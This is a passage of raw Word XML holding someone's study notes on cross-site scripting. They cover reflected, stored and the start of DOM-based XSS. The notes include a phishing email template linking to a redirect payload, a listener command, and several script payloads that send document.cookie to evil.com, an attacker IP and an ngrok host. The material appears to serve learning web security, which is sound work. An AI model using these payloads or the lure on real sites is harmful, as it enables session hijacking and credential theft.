    <w:p w14:paraId="139E3CE5" w14:textId="77777777" w:rsidR="003F2732" w:rsidRPr="003F2732" w:rsidRDefault="003F2732" w:rsidP="003F2732">
      <w:r w:rsidRPr="003F2732">
        <w:t>- However, the application echoes back the search term xxx in the response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3892E0B4" w14:textId="77777777" w:rsidR="003F2732" w:rsidRPr="003F2732" w:rsidRDefault="003F2732" w:rsidP="003F2732">
      <w:r w:rsidRPr="003F2732">
        <w:t>- Use the payload: &lt;script&gt;alert('hacked')&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C3261D" w14:textId="77777777" w:rsidR="003F2732" w:rsidRPr="003F2732" w:rsidRDefault="003F2732" w:rsidP="003F2732">
      <w:r w:rsidRPr="003F2732">
        <w:lastRenderedPageBreak/>
        <w:t>- However, a demonstration showing a JavaScript alert message doesn’t seem like much of a threat.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66CCF268" w14:textId="60807B88" w:rsidR="003F2732" w:rsidRDefault="003F2732" w:rsidP="003F2732">
      <w:r w:rsidRPr="003F2732">
        <w:t>- To fully understand and demonstrate the impact of a Cross-Site Scripting vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC1D4B5" w14:textId="77777777" w:rsidR="003F2732" w:rsidRPr="003F2732" w:rsidRDefault="003F2732" w:rsidP="003F2732"/>
    <w:p w14:paraId="5F7C6023" w14:textId="77777777" w:rsidR="003F2732" w:rsidRPr="003F2732" w:rsidRDefault="003F2732" w:rsidP="003F2732">
      <w:r w:rsidRPr="003F2732">
        <w:t>- Evil Mail:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41810F2F" w14:textId="77777777" w:rsidR="003F2732" w:rsidRPr="003F2732" w:rsidRDefault="003F2732" w:rsidP="003F2732">
      <w:r w:rsidRPr="003F2732">
        <w:t>_____________________</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F304A34" w14:textId="77777777" w:rsidR="003F2732" w:rsidRPr="003F2732" w:rsidRDefault="003F2732" w:rsidP="003F2732">
      <w:r w:rsidRPr="003F2732">
        <w:t>Title: Security Issue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A9B7559" w14:textId="77777777" w:rsidR="003F2732" w:rsidRPr="003F2732" w:rsidRDefault="003F2732" w:rsidP="003F2732">
      <w:r w:rsidRPr="003F2732">
        <w:t xml:space="preserve">From: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003F2732">
        <w:t>natasha</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="48F1A39C" w14:textId="77777777" w:rsidR="003F2732" w:rsidRPr="003F2732" w:rsidRDefault="003F2732" w:rsidP="003F2732">
      <w:r w:rsidRPr="003F2732">
        <w:t>Subject: Security Issue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="791E6E10" w14:textId="77777777" w:rsidR="003F2732" w:rsidRPr="003F2732" w:rsidRDefault="003F2732" w:rsidP="003F2732">
      <w:r w:rsidRPr="003F2732">
        <w:t xml:space="preserve">Hi Alice, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F714637" w14:textId="77777777" w:rsidR="003F2732" w:rsidRPr="003F2732" w:rsidRDefault="003F2732" w:rsidP="003F2732"/>
    <w:p w14:paraId="579F5CC2" w14:textId="77777777" w:rsidR="003F2732" w:rsidRPr="003F2732" w:rsidRDefault="003F2732" w:rsidP="003F2732">
      <w:r w:rsidRPr="003F2732">
        <w:t xml:space="preserve">I took a first pass at testing the latest release and found something interesting in the search feature. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B661D6" w14:textId="77777777" w:rsidR="003F2732" w:rsidRPr="003F2732" w:rsidRDefault="003F2732" w:rsidP="003F2732"/>
    <w:p w14:paraId="4AD3FCAC" w14:textId="77777777" w:rsidR="003F2732" w:rsidRPr="003F2732" w:rsidRDefault="003F2732" w:rsidP="003F2732">
      <w:r w:rsidRPr="003F2732">
        <w:t xml:space="preserve">It's best you take a look at it for yourself, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41913996" w14:textId="77777777" w:rsidR="003F2732" w:rsidRPr="003F2732" w:rsidRDefault="003F2732" w:rsidP="003F2732"/>
    <w:p w14:paraId="7B5B06EE" w14:textId="77777777" w:rsidR="003F2732" w:rsidRPr="003F2732" w:rsidRDefault="003F2732" w:rsidP="003F2732">
      <w:r w:rsidRPr="003F2732">
        <w:t>Regards,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E25D7B0" w14:textId="77777777" w:rsidR="003F2732" w:rsidRPr="003F2732" w:rsidRDefault="003F2732" w:rsidP="003F2732">
      <w:r w:rsidRPr="003F2732">
        <w:t>Natasha</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD06543" w14:textId="77777777" w:rsidR="003F2732" w:rsidRPr="003F2732" w:rsidRDefault="003F2732" w:rsidP="003F2732"/>
    <w:p w14:paraId="21C98B97" w14:textId="77777777" w:rsidR="003F2732" w:rsidRPr="00AB6A3F" w:rsidRDefault="003F2732" w:rsidP="003F2732">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB6A3F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>https://www.target.com/bob/blender/issues?query=&lt;script&gt;document.location = 'www.evil.com';&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="426CD18C" w14:textId="77777777" w:rsidR="003F2732" w:rsidRPr="003F2732" w:rsidRDefault="003F2732" w:rsidP="003F2732"/>
    <w:p w14:paraId="0EAB64A5" w14:textId="77777777" w:rsidR="003F2732" w:rsidRPr="003F2732" w:rsidRDefault="003F2732" w:rsidP="003F2732">
      <w:r w:rsidRPr="003F2732">
        <w:t xml:space="preserve">- Credential Theft: Success! Upon submitting her credentials to the fake login page, Alice's username and password are now logged on </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003F2732">
        <w:t>natasha's</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003F2732">
        <w:t xml:space="preserve"> Apache webserver!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6040C5D6" w14:textId="77777777" w:rsidR="003F2732" w:rsidRPr="003F2732" w:rsidRDefault="003F2732" w:rsidP="003F2732"/>
    <w:p w14:paraId="2FF28FEA" w14:textId="77777777" w:rsidR="003F2732" w:rsidRPr="003F2732" w:rsidRDefault="003F2732" w:rsidP="003F2732"/>
    <w:p w14:paraId="0787D070" w14:textId="77777777" w:rsidR="003F2732" w:rsidRPr="003F2732" w:rsidRDefault="003F2732" w:rsidP="003F2732"/>
    <w:p w14:paraId="005416A8" w14:textId="77777777" w:rsidR="003F2732" w:rsidRPr="003F2732" w:rsidRDefault="003F2732" w:rsidP="003F2732"/>
    <w:p w14:paraId="34F5E6D3" w14:textId="77777777" w:rsidR="003F2732" w:rsidRPr="003F2732" w:rsidRDefault="003F2732" w:rsidP="003F2732"/>
    <w:p w14:paraId="58A5048B" w14:textId="77777777" w:rsidR="003F2732" w:rsidRPr="003F2732" w:rsidRDefault="003F2732" w:rsidP="003F2732"/>
    <w:p w14:paraId="6234D1D0" w14:textId="63AFC31F" w:rsidR="003F2732" w:rsidRPr="003F2732" w:rsidRDefault="003F2732" w:rsidP="003F2732">
      <w:r w:rsidRPr="003F2732">
        <w:t>+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="105194E8" w14:textId="68DD763E" w:rsidR="003F2732" w:rsidRPr="00AB6A3F" w:rsidRDefault="003F2732" w:rsidP="003F2732">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB6A3F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AB6A3F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sXSS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AB6A3F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00AB6A3F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:tab/>
        <w:t>[ Stored XSS ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D43B491" w14:textId="130E1DA4" w:rsidR="003F2732" w:rsidRPr="003F2732" w:rsidRDefault="003F2732" w:rsidP="003F2732">
      <w:r w:rsidRPr="003F2732">
        <w:t>+ Stored cross-site scripting is also known as Persistent cross-site scripting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="416E844F" w14:textId="1F93CC62" w:rsidR="003F2732" w:rsidRPr="003F2732" w:rsidRDefault="003F2732" w:rsidP="003F2732">
      <w:r w:rsidRPr="003F2732">
        <w:t xml:space="preserve">+ It is an attack where the hacker stores the malicious script/code on the targeted servers. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="749EDCE5" w14:textId="2674F93A" w:rsidR="003F2732" w:rsidRPr="003F2732" w:rsidRDefault="003F2732" w:rsidP="003F2732">
      <w:r w:rsidRPr="003F2732">
        <w:t>+ The attacker usually tries to store the payload in the server’s persistent storage in some way.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67BC3F59" w14:textId="29691729" w:rsidR="003F2732" w:rsidRDefault="003F2732" w:rsidP="003F2732">
      <w:r w:rsidRPr="003F2732">
        <w:t xml:space="preserve">+ When a user requests the data, the server delivers legit data mixed with the malicious script, making every application’s user a potential victim of this </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003F2732">
        <w:t>sXSS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003F2732">
        <w:t xml:space="preserve"> attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E7208C" w14:textId="77777777" w:rsidR="00AB6A3F" w:rsidRPr="003F2732" w:rsidRDefault="00AB6A3F" w:rsidP="003F2732"/>
    <w:p w14:paraId="3BD71FFC" w14:textId="77777777" w:rsidR="003F2732" w:rsidRPr="00AB6A3F" w:rsidRDefault="003F2732" w:rsidP="003F2732">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB6A3F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>payload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F2DA8B" w14:textId="34D8913F" w:rsidR="003F2732" w:rsidRPr="00AB6A3F" w:rsidRDefault="003F2732" w:rsidP="003F2732">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB6A3F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>```````````</w:t>
      </w:r>
      <w:r w:rsidR="00AB6A3F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB6D1B9" w14:textId="77777777" w:rsidR="003F2732" w:rsidRPr="003F2732" w:rsidRDefault="003F2732" w:rsidP="003F2732">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003F2732">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>&lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19988E23" w14:textId="77777777" w:rsidR="003F2732" w:rsidRPr="003F2732" w:rsidRDefault="003F2732" w:rsidP="003F2732">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003F2732">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">var </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003F2732">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>img</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003F2732">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003F2732">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>document.createElement</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003F2732">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>("</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003F2732">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>img</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003F2732">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C9185CC" w14:textId="77777777" w:rsidR="003F2732" w:rsidRPr="003F2732" w:rsidRDefault="003F2732" w:rsidP="003F2732">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003F2732">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>img.src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003F2732">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">="https://evil.com" + "/cookie=" + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003F2732">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>encodeURIComponent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003F2732">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003F2732">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>document.cookie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003F2732">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C6959C" w14:textId="77777777" w:rsidR="003F2732" w:rsidRPr="003F2732" w:rsidRDefault="003F2732" w:rsidP="003F2732">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003F2732">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>document.body.appendChild</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003F2732">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003F2732">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>img</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003F2732">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E666BD8" w14:textId="77777777" w:rsidR="003F2732" w:rsidRPr="003F2732" w:rsidRDefault="003F2732" w:rsidP="003F2732">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003F2732">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="400DD277" w14:textId="77777777" w:rsidR="003F2732" w:rsidRDefault="003F2732" w:rsidP="003F2732"/>
    <w:p w14:paraId="19631DAC" w14:textId="6A903698" w:rsidR="003F2732" w:rsidRPr="00AB6A3F" w:rsidRDefault="003F2732" w:rsidP="003F2732">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AB6A3F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AB6A3F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AB6A3F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>lvkp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AB6A3F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A75FC12" w14:textId="77777777" w:rsidR="003F2732" w:rsidRPr="00AB6A3F" w:rsidRDefault="003F2732" w:rsidP="003F2732">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D667442" w14:textId="235BAF8A" w:rsidR="003F2732" w:rsidRPr="00AB6A3F" w:rsidRDefault="003F2732" w:rsidP="003F2732">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB6A3F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AB6A3F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>img</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AB6A3F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AB6A3F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AB6A3F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>="http://attacker'sIP/cookie=+++++++" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E8198CD" w14:textId="77777777" w:rsidR="003F2732" w:rsidRPr="003F2732" w:rsidRDefault="003F2732" w:rsidP="003F2732"/>
    <w:p w14:paraId="0E870808" w14:textId="77777777" w:rsidR="003F2732" w:rsidRPr="003F2732" w:rsidRDefault="003F2732" w:rsidP="003F2732">
      <w:r w:rsidRPr="003F2732">
        <w:t>Payload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D78A14C" w14:textId="365C11B4" w:rsidR="003F2732" w:rsidRPr="00AB6A3F" w:rsidRDefault="003F2732" w:rsidP="003F2732">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB6A3F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>&lt;script&gt;new Image().</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AB6A3F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AB6A3F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">="https://15fc-152-57-199-156.in.ngrok.io/?cookie=" + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AB6A3F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>document.cookie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AB6A3F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="386AC0F5" w14:textId="77777777" w:rsidR="003F2732" w:rsidRPr="003F2732" w:rsidRDefault="003F2732" w:rsidP="003F2732"/>
    <w:p w14:paraId="54FCBA50" w14:textId="29789BF9" w:rsidR="003F2732" w:rsidRDefault="003F2732" w:rsidP="003F2732">
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="00855376">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://gochanakya.com/chanakya-details/Munna-MBBS-1509</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2ACB6B85" w14:textId="77777777" w:rsidR="003F2732" w:rsidRPr="003F2732" w:rsidRDefault="003F2732" w:rsidP="003F2732"/>
    <w:p w14:paraId="03EA2322" w14:textId="255ADA62" w:rsidR="003F2732" w:rsidRPr="003F2732" w:rsidRDefault="003F2732" w:rsidP="003F2732">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="12" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="003F2732">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">&gt; DOM-XSS </w:t>
      </w:r>
      <w:r w:rsidRPr="003F2732">
        <w:tab/>
        <w:t xml:space="preserve">[ JavaScript </w:t>
      </w:r>
      <w:r>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidRPr="003F2732">
        <w:t>- For the DOM-based XSS to take place, the JavaScript code of the web app takes input from a source that is controllable by the attacker, such as the URL in the browser’s tab.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F545A01" w14:textId="1AF51B96" w:rsidR="003F2732" w:rsidRDefault="003F2732" w:rsidP="003F2732">
      <w:r w:rsidRPr="003F2732">
        <w:t xml:space="preserve">- Unless adequate escaping or validation is performed for URL parameters, passing user-supplied input back into a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003F2732">
        <w:t>javascript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003F2732">
        <w:t xml:space="preserve"> or other web components is a common source of DOM Cross-Site Scripting (XSS) attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77FC5A3D" w14:textId="77777777" w:rsidR="003F2732" w:rsidRPr="003F2732" w:rsidRDefault="003F2732" w:rsidP="003F2732"/>
    <w:p w14:paraId="320D991A" w14:textId="77777777" w:rsidR="003F2732" w:rsidRPr="003F2732" w:rsidRDefault="003F2732" w:rsidP="003F2732">
      <w:r w:rsidRPr="003F2732">
        <w:t>NOTE: HTML DOM is a standard for how to add, update, delete or get HTML elements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB751E3" w14:textId="77777777" w:rsidR="003F2732" w:rsidRPr="003F2732" w:rsidRDefault="003F2732" w:rsidP="003F2732"/>
    <w:p w14:paraId="69CD4A54" w14:textId="77777777" w:rsidR="003F2732" w:rsidRPr="003F2732" w:rsidRDefault="003F2732" w:rsidP="003F2732">
      <w:r w:rsidRPr="003F2732">
        <w:t>&lt;!DOCTYPE html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A962B1" w14:textId="77777777" w:rsidR="003F2732" w:rsidRPr="003F2732" w:rsidRDefault="003F2732" w:rsidP="003F2732">
      <w:r w:rsidRPr="003F2732">
        <w:t>&lt;html lang="</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003F2732">
        <w:t>en</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003F2732">
        <w:t>"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143BE28A" w14:textId="77777777" w:rsidR="003F2732" w:rsidRPr="003F2732" w:rsidRDefault="003F2732" w:rsidP="003F2732">
      <w:r w:rsidRPr="003F2732">
        <w:t xml:space="preserve"> &lt;head&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="586E917D" w14:textId="77777777" w:rsidR="003F2732" w:rsidRPr="003F2732" w:rsidRDefault="003F2732" w:rsidP="003F2732">
      <w:r w:rsidRPr="003F2732">
        <w:t xml:space="preserve">  &lt;title&gt;My Page&lt;/title&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D03B95" w14:textId="77777777" w:rsidR="003F2732" w:rsidRPr="003F2732" w:rsidRDefault="003F2732" w:rsidP="003F2732">
      <w:r w:rsidRPr="003F2732">
        <w:t xml:space="preserve"> &lt;/head&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="638A8E6E" w14:textId="77777777" w:rsidR="003F2732" w:rsidRPr="003F2732" w:rsidRDefault="003F2732" w:rsidP="003F2732">
      <w:r w:rsidRPr="003F2732">
        <w:t xml:space="preserve"> &lt;body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558700DB" w14:textId="77777777" w:rsidR="003F2732" w:rsidRPr="003F2732" w:rsidRDefault="003F2732" w:rsidP="003F2732">
      <w:r w:rsidRPr="003F2732">
        <w:t xml:space="preserve">   &lt;h1&gt;page&lt;/h1&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3738A4CE" w14:textId="77777777" w:rsidR="003F2732" w:rsidRPr="003F2732" w:rsidRDefault="003F2732" w:rsidP="003F2732">
      <w:r w:rsidRPr="003F2732">
        <w:t xml:space="preserve"> &lt;/body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1317451C" w14:textId="77777777" w:rsidR="003F2732" w:rsidRPr="003F2732" w:rsidRDefault="003F2732" w:rsidP="003F2732">
      <w:r w:rsidRPr="003F2732">
        <w:t>&lt;/html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC30794" w14:textId="77777777" w:rsidR="003F2732" w:rsidRPr="003F2732" w:rsidRDefault="003F2732" w:rsidP="003F2732"/>
    <w:p w14:paraId="1B06B2C0" w14:textId="77777777" w:rsidR="003F2732" w:rsidRPr="003F2732" w:rsidRDefault="003F2732" w:rsidP="003F2732">
      <w:r w:rsidRPr="003F2732">
        <w:t>1. host on web server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B043E7F" w14:textId="77777777" w:rsidR="003F2732" w:rsidRPr="003F2732" w:rsidRDefault="003F2732" w:rsidP="003F2732">
      <w:r w:rsidRPr="003F2732">
        <w:t xml:space="preserve">2. Open chrome &amp; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003F2732">
        <w:t>visit:http</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003F2732">
        <w:t>://192.168.1.111/1.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CDE8AAC" w14:textId="77777777" w:rsidR="003F2732" w:rsidRPr="003F2732" w:rsidRDefault="003F2732" w:rsidP="003F2732">
      <w:r w:rsidRPr="003F2732">
        <w:t xml:space="preserve">3. Open </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003F2732">
        <w:t>Devloper</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003F2732">
        <w:t xml:space="preserve"> tools console</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="207A97C4" w14:textId="77777777" w:rsidR="003F2732" w:rsidRPr="003F2732" w:rsidRDefault="003F2732" w:rsidP="003F2732">
      <w:r w:rsidRPr="003F2732">
        <w:t>4. run: &gt; document</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A1D0549" w14:textId="77777777" w:rsidR="003F2732" w:rsidRPr="003F2732" w:rsidRDefault="003F2732" w:rsidP="003F2732">
      <w:r w:rsidRPr="003F2732">
        <w:t>________________</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66607525" w14:textId="77777777" w:rsidR="003F2732" w:rsidRPr="003F2732" w:rsidRDefault="003F2732" w:rsidP="003F2732">
      <w:r w:rsidRPr="003F2732">
        <w:t xml:space="preserve">NOTE: If you will use JavaScript to modify HTML </w:t>
      </w:r>
    </w:p>
